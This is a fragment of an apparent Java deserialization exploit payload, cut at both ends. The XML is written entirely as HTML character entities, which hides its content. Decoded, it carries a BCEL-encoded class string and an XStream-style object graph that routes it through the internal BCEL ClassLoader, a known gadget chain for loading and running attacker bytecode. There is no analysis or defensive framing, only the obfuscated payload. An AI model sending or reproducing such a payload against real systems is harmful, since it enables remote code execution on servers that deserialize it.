x24;&#x74;&#x24;&#x47;&#x24;&#x33;&#x65;&#x24;&#x63;&#x35;&#x67;&#x24;&#x47;&#x24;&#x33;&#x65;&#x24;&#x63;&#x37;&#x24;&#x58;&#x24;&#x77;&#x24;&#x62;&#x65;&#x34;&#x24;&#x66;&#x30;&#x24;&#x56;&#x24;&#x62;&#x65;&#x24;&#x39;&#x36;&#x64;&#x24;&#x37;&#x64;&#x24;&#x61;&#x33;&#x24;&#x61;&#x30;&#x24;&#x65;&#x31;&#x64;&#x24;&#x62;&#x66;&#x24;&#x38;&#x31;&#x6f;&#x24;&#x66;&#x31;&#x24;&#x39;&#x64;&#x24;&#x38;&#x31;&#x24;&#x65;&#x66;&#x71;&#x24;&#x63;&#x39;&#x24;&#x63;&#x30;&#x24;&#x50;&#x24;&#x66;&#x38;&#x51;&#x24;&#x42;&#x58;&#x24;&#x62;&#x66;&#x24;&#x33;&#x61;&#x24;&#x46;&#x32;&#x24;&#x66;&#x30;&#x24;&#x54;&#x36;&#x24;&#x64;&#x33;&#x24;&#x66;&#x64;&#x52;&#x24;&#x62;&#x62;&#x24;&#x78;&#x24;&#x65;&#x38;&#x24;&#x62;&#x61;&#x53;&#x24;&#x38;&#x66;&#x24;&#x77;&#x24;&#x65;&#x38;&#x24;&#x62;&#x63;&#x43;&#x24;&#x64;&#x66;&#x55;&#x24;&#x63;&#x35;&#x24;&#x33;&#x63;&#x36;&#x24;&#x65;&#x33;&#x31;&#x24;&#x52;&#x24;&#x57;&#x24;&#x62;&#x65;&#x24;&#x64;&#x32;&#x24;&#x63;&#x66;&#x24;&#x38;&#x62;&#x24;&#x66;&#x62;&#x35;&#x24;&#x66;&#x31;&#x24;&#x65;&#x65;&#x24;&#x66;&#x34;&#x4a;&#x24;&#x55;&#x24;&#x66;&#x62;&#x24;&#x61;&#x33;&#x43;&#x24;&#x39;&#x36;&#x24;&#x63;&#x36;&#x75;&#x24;&#x37;&#x63;&#x24;&#x62;&#x31;&#x24;&#x65;&#x30;&#x24;&#x48;&#x65;&#x48;&#x24;&#x62;&#x62;&#x65;&#x24;&#x57;&#x62;&#x55;&#x24;&#x66;&#x30;&#x65;&#x47;&#x52;&#x24;&#x61;&#x37;&#x24;&#x65;&#x65;&#x24;&#x42;&#x24;&#x64;&#x33;&#x24;&#x63;&#x38;&#x24;&#x66;&#x32;&#x24;&#x72;&#x24;&#x39;&#x30;&#x24;&#x75;&#x24;&#x64;&#x38;&#x24;&#x55;&#x24;&#x61;&#x66;&#x24;&#x65;&#x64;&#x24;&#x65;&#x33;&#x24;&#x67;&#x24;&#x38;&#x62;&#x24;&#x37;&#x64;&#x65;&#x24;&#x65;&#x36;&#x24;&#x58;&#x24;&#x66;&#x33;&#x24;&#x64;&#x62;&#x24;&#x35;&#x62;&#x47;&#x24;&#x65;&#x37;&#x44;&#x24;&#x38;&#x64;&#x4e;&#x24;&#x66;&#x37;&#x24;&#x64;&#x64;&#x24;&#x61;&#x36;&#x24;&#x62;&#x38;&#x24;&#x64;&#x31;&#x76;&#x24;&#x65;&#x36;&#x24;&#x64;&#x63;&#x59;&#x24;&#x62;&#x36;&#x24;&#x66;&#x30;&#x24;&#x61;&#x65;&#x78;&#x24;&#x65;&#x64;&#x24;&#x66;&#x38;&#x24;&#x39;&#x65;&#x24;&#x61;&#x38;&#x24;&#x56;&#x75;&#x24;&#x64;&#x37;&#x24;&#x68;&#x72;&#x4d;&#x72;&#x52;&#x4e;&#x24;&#x61;&#x33;&#x24;&#x62;&#x64;&#x24;&#x39;&#x36;&#x24;&#x47;&#x39;&#x54;&#x24;&#x45;&#x64;&#x24;&#x38;&#x61;&#x79;&#x24;&#x65;&#x31;&#x59;&#x65;&#x54;&#x24;&#x68;&#x24;&#x66;&#x37;&#x24;&#x38;&#x33;&#x24;&#x38;&#x32;&#x24;&#x68;&#x4f;&#x4c;&#x55;&#x24;&#x77;&#x24;&#x64;&#x32;&#x24;&#x37;&#x62;&#x24;&#x38;&#x66;&#x24;&#x66;&#x63;&#x57;&#x24;&#x35;&#x65;&#x24;&#x69;&#x24;&#x7a;&#x24;&#x46;&#x24;&#x65;&#x31;&#x24;&#x66;&#x37;&#x24;&#x35;&#x62;&#x24;&#x39;&#x36;&#x24;&#x75;&#x24;&#x55;&#x24;&#x65;&#x63;&#x24;&#x66;&#x32;&#x4d;&#x24;&#x59;&#x24;&#x39;&#x66;&#x24;&#x39;&#x30;&#x24;&#x64;&#x37;&#x67;&#x24;&#x38;&#x38;&#x24;&#x39;&#x36;&#x24;&#x56;&#x6c;&#x24;&#x61;&#x65;&#x24;&#x39;&#x33;&#x4c;&#x24;&#x64;&#x64;&#x24;&#x63;&#x38;&#x24;&#x70;&#x24;&#x66;&#x33;&#x24;&#x62;&#x32;&#x24;&#x63;&#x31;&#x59;&#x24;&#x61;&#x31;&#x7a;&#x24;&#x64;&#x65;&#x24;&#x63;&#x37;&#x24;&#x58;&#x24;&#x68;&#x39;&#x24;&#x39;&#x30;&#x24;&#x6b;&#x24;&#x7a;&#x24;&#x33;&#x61;&#x24;&#x62;&#x65;&#x24;&#x39;&#x64;&#x24;&#x61;&#x62;&#x24;&#x64;&#x63;&#x53;&#x4b;&#x24;&#x39;&#x62;&#x24;&#x38;&#x65;&#x24;&#x61;&#x61;&#x24;&#x37;&#x63;&#x24;&#x78;&#x62;&#x24;&#x67;&#x24;&#x4f;&#x24;&#x38;&#x62;&#x24;&#x46;&#x61;&#x71;&#x24;&#x66;&#x34;&#x24;&#x65;&#x66;&#x24;&#x39;&#x31;&#x24;&#x64;&#x35;&#x24;&#x52;&#x24;&#x63;&#x66;&#x24;&#x39;&#x35;&#x24;&#x76;&#x24;&#x66;&#x34;&#x55;&#x79;&#x24;&#x61;&#x61;&#x24;&#x49;&#x39;&#x24;&#x38;&#x36;&#x24;&#x66;&#x34;&#x74;&#x24;&#x63;&#x30;&#x24;&#x63;&#x39;&#x24;&#x58;&#x24;&#x37;&#x64;&#x6a;&#x24;&#x4b;&#x33;&#x24;&#x63;&#x37;&#x24;&#x38;&#x36;&#x24;&#x35;&#x65;&#x24;&#x66;&#x34;&#x24;&#x63;&#x36;&#x24;&#x64;&#x31;&#x24;&#x35;&#x63;&#x76;&#x24;&#x34;&#x30;&#x24;&#x66;&#x35;&#x24;&#x61;&#x65;&#x78;&#x24;&#x64;&#x64;&#x24;&#x44;&#x24;&#x39;&#x39;&#x24;&#x38;&#x33;&#x51;&#x24;&#x79;&#x24;&#x38;&#x38;&#x41;&#x24;&#x39;&#x31;&#x24;&#x62;&#x35;&#x73;&#x24;&#x65;&#x35;&#x51;&#x24;&#x62;&#x65;&#x4b;&#x48;&#x24;&#x78;&#x24;&#x61;&#x65;&#x4a;&#x75;&#x24;&#x63;&#x36;&#x24;&#x79;&#x24;&#x38;&#x63;&#x24;&#x62;&#x32;&#x24;&#x63;&#x66;&#x24;&#x38;&#x33;&#x24;&#x39;&#x66;&#x24;&#x61;&#x36;&#x24;&#x4a;&#x24;&#x65;&#x36;&#x24;&#x65;&#x34;&#x24;&#x45;&#x24;&#x39;&#x62;&#x24;&#x65;&#x61;&#x24;&#x63;&#x31;&#x58;&#x24;&#x62;&#x61;&#x72;&#x24;&#x35;&#x62;&#x24;&#x66;&#x33;&#x24;&#x37;&#x63;&#x24;&#x66;&#x31;&#x24;&#x38;&#x33;&#x24;&#x64;&#x62;&#x73;&#x24;&#x63;&#x63;&#x33;&#x24;&#x7a;&#x24;&#x38;&#x31;&#x24;&#x38;&#x64;&#x78;&#x24;&#x38;&#x34;&#x24;&#x33;&#x66;&#x24;&#x61;&#x33;&#x24;&#x66;&#x32;&#x24;&#x61;&#x66;&#x24;&#x38;&#x31;&#x24;&#x64;&#x33;&#x24;&#x63;&#x63;&#x6b;&#x24;&#x39;&#x31;&#x24;&#x65;&#x62;&#x24;&#x57;&#x24;&#x65;&#x65;&#x24;&#x39;&#x32;&#x24;&#x37;&#x63;&#x72;&#x24;&#x63;&#x30;&#x24;&#x52;&#x24;&#x65;&#x39;&#x24;&#x62;&#x39;&#x24;&#x47;&#x24;&#x65;&#x35;&#x6a;&#x70;&#x24;&#x69;&#x24;&#x65;&#x37;&#x24;&#x64;&#x61;&#x24;&#x59;&#x24;&#x49;&#x24;&#x39;&#x62;&#x24;&#x64;&#x30;&#x24;&#x63;&#x64;&#x24;&#x64;&#x35;&#x24;&#x75;&#x24;&#x44;&#x24;&#x64;&#x30;&#x24;&#x38;&#x33;&#x24;&#x61;&#x64;&#x24;&#x37;&#x63;&#x6a;&#x24;&#x64;&#x38;&#x24;&#x62;&#x36;&#x24;&#x61;&#x38;&#x24;&#x61;&#x63;&#x24;&#x64;&#x63;&#x24;&#x6f;&#x4e;&#x24;&#x61;&#x37;&#x24;&#x65;&#x63;&#x24;&#x39;&#x66;&#x24;&#x65;&#x62;&#x68;&#x24;&#x75;&#x24;&#x6e;&#x24;&#x55;&#x24;&#x4e;&#x24;&#x39;&#x37;&#x24;&#x51;&#x39;&#x24;&#x64;&#x34;&#x24;&#x54;&#x6d;&#x24;&#x4d;&#x24;&#x64;&#x64;&#x24;&#x38;&#x34;&#x5a;&#x24;&#x38;&#x32;&#x24;&#x39;&#x36;&#x24;&#x64;&#x65;&#x24;&#x61;&#x61;&#x24;&#x66;&#x30;&#x24;&#x61;&#x64;&#x24;&#x61;&#x39;&#x24;&#x45;&#x24;&#x37;&#x64;&#x64;&#x24;&#x35;&#x62;&#x24;&#x4a;&#x24;&#x63;&#x64;&#x24;&#x72;&#x24;&#x59;&#x24;&#x64;&#x31;&#x24;&#x39;&#x36;&#x24;&#x53;&#x56;&#x24;&#x38;&#x64;&#x24;&#x66;&#x36;&#x24;&#x53;&#x24;&#x64;&#x37;&#x24;&#x64;&#x61;&#x4b;&#x51;&#x24;&#x35;&#x62;&#x24;&#x77;&#x24;&#x69;&#x24;&#x65;&#x33;&#x24;&#x37;&#x62;&#x73;&#x74;&#x75;&#x45;&#x24;&#x70;&#x24;&#x56;&#x24;&#x38;&#x39;&#x45;&#x62;&#x24;&#x65;&#x31;&#x24;&#x38;&#x61;&#x24;&#x64;&#x32;&#x5f;&#x24;&#x38;&#x38;&#x24;&#x61;&#x36;&#x24;&#x67;&#x63;&#x24;&#x38;&#x64;&#x24;&#x64;&#x31;&#x24;&#x66;&#x36;&#x24;&#x53;&#x24;&#x64;&#x36;&#x48;&#x24;&#x66;&#x64;&#x68;&#x47;&#x24;&#x39;&#x38;&#x24;&#x61;&#x38;&#x24;&#x65;&#x33;&#x24;&#x61;&#x31;&#x24;&#x65;&#x38;&#x24;&#x64;&#x61;&#x24;&#x38;&#x63;&#x24;&#x38;&#x34;&#x24;&#x61;&#x61;&#x31;&#x75;&#x24;&#x68;&#x24;&#x46;&#x4d;&#x24;&#x55;&#x74;&#x66;&#x24;&#x43;&#x24;&#x66;&#x38;&#x24;&#x64;&#x61;&#x24;&#x39;&#x34;&#x24;&#x66;&#x36;&#x24;&#x33;&#x62;&#x24;&#x62;&#x61;&#x24;&#x38;&#x65;&#x5f;&#x47;&#x24;&#x79;&#x24;&#x61;&#x36;&#x24;&#x39;&#x35;&#x24;&#x62;&#x30;&#x24;&#x61;&#x65;&#x24;&#x38;&#x34;&#x24;&#x66;&#x35;&#x24;&#x64;&#x37;&#x24;&#x62;&#x30;&#x24;&#x6e;&#x7a;&#x5f;&#x24;&#x4a;&#x24;&#x66;&#x37;&#x24;&#x61;&#x37;&#x24;&#x39;&#x61;&#x62;&#x24;&#x38;&#x64;&#x31;&#x24;&#x64;&#x61;&#x24;&#x37;&#x63;&#x24;&#x65;&#x30;&#x24;&#x53;&#x24;&#x39;&#x61;&#x24;&#x65;&#x35;&#x24;&#x66;&#x33;&#x24;&#x63;&#x31;&#x24;&#x78;&#x24;&#x38;&#x38;&#x44;&#x37;&#x24;&#x64;&#x32;&#x24;&#x65;&#x65;&#x24;&#x56;&#x68;&#x24;&#x38;&#x37;&#x7a;&#x4a;&#x78;&#x24;&#x66;&#x38;&#x6a;&#x24;&#x39;&#x30;&#x24;&#x65;&#x33;&#x24;&#x4e;&#x24;&#x66;&#x63;&#x24;&#x63;&#x31;&#x24;&#x5f;&#x24;&#x38;&#x31;&#x50;&#x24;&#x63;&#x30;&#x24;&#x63;&#x30;&#x30;&#x56;&#x24;&#x48;&#x24;&#x62;&#x39;&#x24;&#x68;&#x68;&#x41;&#x24;&#x74;&#x56;&#x24;&#x39;&#x31;&#x24;&#x63;&#x30;&#x56;&#x24;&#x71;&#x24;&#x64;&#x30;&#x24;&#x38;&#x36;&#x24;&#x39;&#x64;&#x24;&#x39;&#x34;&#x24;&#x61;&#x37;&#x24;&#x66;&#x38;&#x24;&#x62;&#x31;&#x71;&#x24;&#x51;&#x24;&#x65;&#x64;&#x24;&#x39;&#x38;&#x24;&#x63;&#x30;&#x24;&#x67;&#x24;&#x39;&#x38;&#x24;&#x65;&#x38;&#x24;&#x34;&#x30;&#x24;&#x52;&#x6b;&#x79;&#x6d;&#x77;&#x24;&#x65;&#x32;&#x32;&#x24;&#x33;&#x66;&#x24;&#x76;&#x6e;&#x24;&#x36;&#x30;&#x24;&#x33;&#x64;&#x24;&#x61;&#x64;&#x24;&#x63;&#x34;&#x70;&#x24;&#x54;&#x24;&#x65;&#x62;&#x24;&#x66;&#x30;&#x37;&#x36;&#x24;&#x45;&#x24;&#x4d;&#x24;&#x65;&#x36;&#x24;&#x64;&#x31;&#x4c;&#x24;&#x33;&#x62;&#x24;&#x62;&#x66;&#x24;&#x61;&#x30;&#x24;&#x39;&#x37;&#x24;&#x57;&#x24;&#x51;&#x24;&#x65;&#x30;&#x24;&#x39;&#x32;&#x24;&#x64;&#x38;&#x4e;&#x24;&#x38;&#x66;&#x24;&#x68;&#x79;&#x24;&#x63;&#x37;&#x24;&#x65;&#x65;&#x24;&#x63;&#x30;&#x24;&#x61;&#x33;&#x24;&#x65;&#x34;&#x24;&#x33;&#x63;&#x24;&#x63;&#x31;&#x24;&#x39;&#x62;&#x24;&#x37;&#x63;&#x24;&#x74;&#x24;&#x33;&#x66;&#x24;&#x38;&#x62;&#x42;&#x24;&#x62;&#x34;&#x24;&#x37;&#x64;&#x24;&#x42;&#x24;&#x38;&#x66;&#x53;&#x24;&#x57;&#x24;&#x61;&#x36;&#x24;&#x48;&#x24;&#x58;&#x4f;&#x24;&#x51;&#x24;&#x58;&#x24;&#x61;&#x31;&#x24;&#x39;&#x66;&#x53;&#x78;&#x24;&#x53;&#x4f;&#x24;&#x39;&#x31;&#x24;&#x65;&#x64;&#x24;&#x6f;&#x24;&#x47;&#x24;&#x62;&#x31;&#x24;&#x38;&#x62;&#x32;&#x24;&#x39;&#x35;&#x24;&#x66;&#x65;&#x24;&#x62;&#x36;&#x24;&#x54;&#x24;&#x64;&#x62;&#x24;&#x63;&#x37;&#x7a;&#x24;&#x35;&#x63;&#x24;&#x61;&#x36;&#x24;&#x63;&#x35;&#x24;&#x64;&#x64;&#x78;&#x24;&#x39;&#x61;&#x24;&#x64;&#x35;&#x24;&#x62;&#x61;&#x49;&#x24;&#x61;&#x64;&#x24;&#x33;&#x64;&#x78;&#x24;&#x38;&#x36;&#x24;&#x33;&#x65;&#x24;&#x66;&#x36;&#x24;&#x66;&#x32;&#x24;&#x66;&#x66;&#x34;&#x24;&#x63;&#x32;&#x24;&#x62;&#x37;&#x24;&#x66;&#x31;&#x24;&#x78;&#x74;&#x24;&#x56;&#x24;&#x66;&#x64;&#x24;&#x77;&#x24;&#x66;&#x36;&#x24;&#x61;&#x39;&#x24;&#x59;&#x50;&#x31;&#x24;&#x59;&#x24;&#x61;&#x63;&#x24;&#x37;&#x63;&#x24;&#x6c;&#x24;&#x4b;&#x24;&#x64;&#x36;&#x61;&#x24;&#x56;&#x24;&#x63;&#x66;&#x42;&#x24;&#x65;&#x31;&#x24;&#x65;&#x65;&#x36;&#x24;&#x38;&#x33;&#x24;&#x62;&#x39;&#x24;&#x58;&#x24;&#x61;&#x65;&#x24;&#x6e;&#x24;&#x64;&#x38;&#x24;&#x4e;&#x24;&#x64;&#x66;&#x66;&#x24;&#x33;&#x63;&#x24;&#x39;&#x30;&#x4a;&#x24;&#x66;&#x62;&#x24;&#x63;&#x33;&#x54;&#x24;&#x33;&#x61;&#x24;&#x51;&#x74;&#x24;&#x63;&#x63;&#x24;&#x63;&#x31;&#x24;&#x66;&#x66;&#x24;&#x41;&#x24;&#x54;&#x24;&#x62;&#x35;&#x6c;&#x24;&#x37;&#x65;&#x24;&#x64;&#x37;&#x24;&#x4a;&#x24;&#x41;&#x24;&#x41;&#x0a;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x32;&#x63;&#x65;&#x72;&#x74;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x68;&#x61;&#x73;&#x68;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x20;&#x64;&#x65;&#x66;&#x69;&#x6e;&#x65;&#x64;&#x2d;&#x69;&#x6e;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x6c;&#x61;&#x6e;&#x67;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x69;&#x6e;&#x63;&#x69;&#x70;&#x61;&#x6c;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x3c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x22;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x73;&#x65;&#x74;&#x22;&#x3e;&#x3c;&#x2f;&#x63;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x75;&#x74;&#x65;&#x78;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x22;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x22;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x3e;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x74;&#x69;&#x76;&#x65;&#x4c;&#x69;&#x62;&#x72;&#x61;&#x72;&#x69;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x4c;&#x6f;&#x63;&#x6b;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2